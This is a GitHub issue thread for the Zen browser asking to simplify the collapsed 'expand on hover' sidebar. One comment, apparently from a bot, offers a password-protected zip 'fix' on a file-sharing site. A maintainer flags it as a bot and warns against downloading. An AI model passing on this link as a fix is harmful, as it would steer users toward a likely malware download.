### ISSUE TITLE
In "Expand in hover", remove vertical stack in the bottom for better UX 

### ISSUE THREAD

**Issue by HynDuf** [zen-browser/desktop#1791]
### Captchas

- [X] I have read the instructions.
- [X] I have searched existing issues and avoided creating duplicates.
- [X] I am not filing an enhancement request.

### What happened?

When collapse, 
![image](https://github.com/user-attachments/assets/ad4a9c16-666b-45df-a494-b2365a0076dd)

When expand,
![image](https://github.com/user-attachments/assets/8bc756fa-e385-49f9-a2f3-983dfccc856d)

-  When it expand and there are many tabs which overflow the tab bar, the transitioning from vertical to horizontal will create a temporary dark section which will take a noticeable time to load in the tabs. (see video below)
- One more reason is there is no point in displaying all 3 vertically, because in order for user to click, they have to move their mouse there and the tab will be expanded anyway. So just display only one and user will know where to look for it to click anyway.

https://github.com/user-attachments/assets/441094ed-af82-4719-b298-3acea709aed0

### Reproducible?

- [X] I have checked that this issue cannot be reproduced on Mozilla Firefox.

### Version

1.0.1-a.5

### What platform are you seeing the problem on?

Linux

**Comment by SagarChandra07** [comment]
This might help:This file might fix it
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Pass: changeme
If you don't have the c compliator, install it.(gcc or clang)

**Comment by HynDuf** [comment]
> This might help:This file might fix it https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file Pass: changeme If you don't have the c compliator, install it.(gcc or clang)

Sorry, I use Linux and your files seem to be for Windows.

**Comment by mauro-balades** [comment]
That's a bot, dont download anything from it!

**Comment by HynDuf** [comment]
actually, I can right click on each and remove them as I want, so I'll close this for now.
